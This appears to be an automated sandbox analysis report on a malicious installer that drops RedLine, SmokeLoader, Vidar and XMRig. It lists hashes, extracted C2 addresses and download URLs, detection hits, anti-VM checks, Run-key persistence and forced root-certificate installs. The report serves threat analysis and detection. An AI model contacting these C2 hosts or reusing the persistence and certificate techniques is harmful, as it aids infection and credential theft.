Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
9963s -
max time network
10831s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
01-11-2021 06:40
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/2144-232-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2144-233-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2144-234-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2144-235-0x0000000000418D3E-mapping.dmp family_redline behavioral1/memory/2144-237-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x00050000000125b7-107.dat family_socelars behavioral1/files/0x00050000000125b7-143.dat family_socelars behavioral1/files/0x00050000000125b7-129.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1076-398-0x0000000003070000-0x0000000003146000-memory.dmp family_vidar behavioral1/memory/1076-399-0x0000000000400000-0x0000000002BB8000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral1/memory/3492-424-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
resource yara_rule behavioral1/files/0x0006000000012237-69.dat aspack_v212_v242 behavioral1/files/0x0006000000012237-70.dat aspack_v212_v242 behavioral1/files/0x0007000000012222-71.dat aspack_v212_v242 behavioral1/files/0x0007000000012222-72.dat aspack_v212_v242 behavioral1/files/0x000600000001224a-75.dat aspack_v212_v242 behavioral1/files/0x000600000001224a-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 60 IoCs
pid Process 2028 setup_installer.exe 680 setup_install.exe 856 Sun03d477f1a31.exe 1096 Sun033e271e0ce96c08.exe 1728 Sun038aa349e3318e.exe 568 Sun0324aba28588c0.exe 1088 Sun0397381f1f458e.exe 288 Sun038db98f99bf9a.exe 1036 Sun03e4aeb7e43a1c.exe 1584 Sun03ea09aa5c9686e5.exe 1184 Sun03f0dc4460bc9.exe 1472 Sun0397381f1f458e.exe 268 Sun0328255c4bce6fb.exe 1868 Sun03f5d51697d04.exe 784 Sun0351a0558292.exe 1300 Sun03f5d51697d04.tmp 524 Sun03f5d51697d04.exe 1248 Sun03f5d51697d04.tmp 2144 Sun03f0dc4460bc9.exe 2552 BnbpIxC5RaMUqdV08_JMLpxz.exe 2784 EG2euHbbW01B89lCgVNdYQHC.exe 2368 LzmwAqmV.exe 268 Chrome5.exe 692 DownFlSetup110.exe 1816 inst1.exe 1076 Soft1WW01.exe 2632 4.exe 2664 5.exe 1636 search_hyperfs_206.exe 2132 3793266.exe 2216 setup.exe 2720 4691549.exe 2220 8709834.exe 2228 chenxiulan-game.exe 2952 5717225.exe 2084 Calculator Installation.exe 2560 postback.exe 2904 6.exe 2648 6391113.exe 2600 3606297.exe 2068 WinHoster.exe 2376 kPBhgOaGQk.exe 1720 ozR8x.ExE 2428 mk.exe 3312 services64.exe 3424 sihost64.exe 3300 Sun039750b00c.exe 1340 rubjrie 2576 rubjrie 2324 rubjrie 2136 rubjrie 3220 rubjrie 3676 rubjrie 3884 rubjrie 3760 rubjrie 1132 rubjrie 1076 rubjrie 2856 rubjrie 2688 rubjrie 4000 rubjrie -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8709834.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4691549.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4691549.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8709834.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Sun038db98f99bf9a.exe Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Sun038aa349e3318e.exe -
Loads dropped DLL 64 IoCs
pid Process 1692 setup_x86_x64_install.exe 2028 setup_installer.exe 2028 setup_installer.exe 2028 setup_installer.exe 2028 setup_installer.exe 2028 setup_installer.exe 2028 setup_installer.exe 680 setup_install.exe 680 setup_install.exe 680 setup_install.exe 680 setup_install.exe 680 setup_install.exe 680 setup_install.exe 680 setup_install.exe 680 setup_install.exe 1852 cmd.exe 1832 cmd.exe 1832 cmd.exe 1920 cmd.exe 1920 cmd.exe 1100 cmd.exe 1100 cmd.exe 1800 cmd.exe 1228 cmd.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 568 Sun0324aba28588c0.exe 568 Sun0324aba28588c0.exe 1096 Sun033e271e0ce96c08.exe 1096 Sun033e271e0ce96c08.exe 1088 Sun0397381f1f458e.exe 1088 Sun0397381f1f458e.exe 1736 cmd.exe 712 cmd.exe 112 cmd.exe 712 cmd.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 112 cmd.exe 1088 Sun0397381f1f458e.exe 1036 Sun03e4aeb7e43a1c.exe 1036 Sun03e4aeb7e43a1c.exe 1840 cmd.exe 1340 cmd.exe 1184 Sun03f0dc4460bc9.exe 1184 Sun03f0dc4460bc9.exe 2032 cmd.exe 1868 Sun03f5d51697d04.exe 1868 Sun03f5d51697d04.exe 1472 Sun0397381f1f458e.exe 1472 Sun0397381f1f458e.exe 856 Sun03d477f1a31.exe 856 Sun03d477f1a31.exe 1868 Sun03f5d51697d04.exe 1300 Sun03f5d51697d04.tmp 1300 Sun03f5d51697d04.tmp 1300 Sun03f5d51697d04.tmp 1300 Sun03f5d51697d04.tmp 524 Sun03f5d51697d04.exe 524 Sun03f5d51697d04.exe 524 Sun03f5d51697d04.exe 1248 Sun03f5d51697d04.tmp 1248 Sun03f5d51697d04.tmp 1248 Sun03f5d51697d04.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6391113.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8709834.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4691549.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 58 ip-api.com 39 ipinfo.io 40 ipinfo.io 53 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2720 4691549.exe 2220 8709834.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1184 set thread context of 2144 1184 Sun03f0dc4460bc9.exe 65 PID 3484 set thread context of 3492 3484 conhost.exe 146 -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-S41G9.tmp Sun03f5d51697d04.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 552 1728 WerFault.exe 59 2856 288 WerFault.exe 45 2256 1036 WerFault.exe 48 2480 2632 WerFault.exe 87 2384 1076 WerFault.exe 86 3784 2904 WerFault.exe 101 396 2428 WerFault.exe 142 -
Checks SCSI registry key(s) 3 TTPs 42 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rubjrie -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3980 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 2624 taskkill.exe 2660 taskkill.exe 932 taskkill.exe 1836 taskkill.exe 1548 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun03d477f1a31.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun03d477f1a31.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Chrome5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Chrome5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Chrome5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Chrome5.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1072 powershell.exe 1300 powershell.exe 568 Sun0324aba28588c0.exe 568 Sun0324aba28588c0.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 288 Sun038db98f99bf9a.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 Sun038aa349e3318e.exe 1728 